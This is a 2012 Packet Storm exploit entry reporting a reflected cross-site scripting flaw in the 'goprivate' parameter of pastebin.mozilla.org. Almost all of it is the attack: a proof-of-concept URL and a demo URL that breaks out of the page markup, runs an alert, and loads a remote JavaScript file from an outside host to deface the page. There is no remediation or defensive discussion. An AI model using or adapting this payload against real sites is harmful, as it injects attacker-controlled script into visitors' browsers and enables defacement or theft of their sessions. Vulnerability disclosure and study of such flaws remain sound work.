Pastebin.mozilla.org Cross Site Scripting

2012-04-12T00:00:00
ID PACKETSTORM:111794
Type packetstorm
Reporter Atmon3r
Modified 2012-04-12T00:00:00

Description

                                        
                                            `+-------------------------------------------------------------------------+  
# Exploit Title : Pastebin.mozilla.org - website XSS (Cross Site   
Scripting) and deface passive  
# Author : Atmon3r (atmoner.com)  
# Date : 12/04/2012  
# Editor : Jeroen (pastebin.com)  
# Xss type : $_GET  
+-------------------------------------------------------------------------+  
  
[+] POC:  
http://pastebin.mozilla.org/?help=1&goprivate={XSS}&go=Go  
  
[+] DEMO:  
http://pastebin.mozilla.org/?help=1&goprivate=/"><script>alert('Xss By   
Atm0n3r')</script><script type="text/javascript"   
src="http://yourjavascript.com/27544112151/xss.atmon3r.js"></script>&go=Go  
  
  
`